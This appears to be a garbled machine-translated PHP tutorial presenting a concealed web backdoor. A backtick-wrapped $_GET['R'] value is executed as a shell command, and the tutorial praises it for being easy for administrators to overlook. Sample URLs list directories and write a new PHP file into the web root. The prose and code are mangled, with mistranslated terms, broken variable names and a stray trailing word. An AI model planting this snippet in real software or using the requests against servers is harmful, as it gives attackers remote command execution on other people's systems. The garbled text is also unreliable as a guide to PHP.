A difficult to find PHP backdoor code parsing _ PHP Tutorial

Parsing a PHP backdoor code that is hard to be found. When I see a piece of code by accident, it seems that there is no problem. it is indeed a fatal backdoor code. here I use an anti-code that is not followed by a general PHPer ', when I see a section containing an anti-apostrophes by accident, it seems that there is no problem, but it is actually a fatal backdoor code. here I use an anti-apostrophes that are not very concerned by a general PHPer ', the string contained by the anti-code. it is equivalent to the shell_exec function.

The pseudoassembly is good and can be easily ignored by administrators.

$ SelfNums = $ _ GET ['R']; if (isset ($ selfNums) {echo '$ selfNums ';}

When I see this code, I think everyone will say that there is no problem, but careful friends will also find that the following variables are wrapped by a symbol. since it is a variable, why,

It is not a single quotation mark. this is the key. This symbol is a key under Esc (located in the exclamation point! ),

Echo 'system command '; achieves the same effect as system ();

If you do not believe it, you can test it.

Http: // 127.0.0.1/t. php? R = dirList directories

Http: // 127.0.0.1/t. php? R = echo I am Ma er> D: \ web \ 90sec. php

I have successfully tested appserv and the VM.

Taobao', which is included in the anti-apostrophes...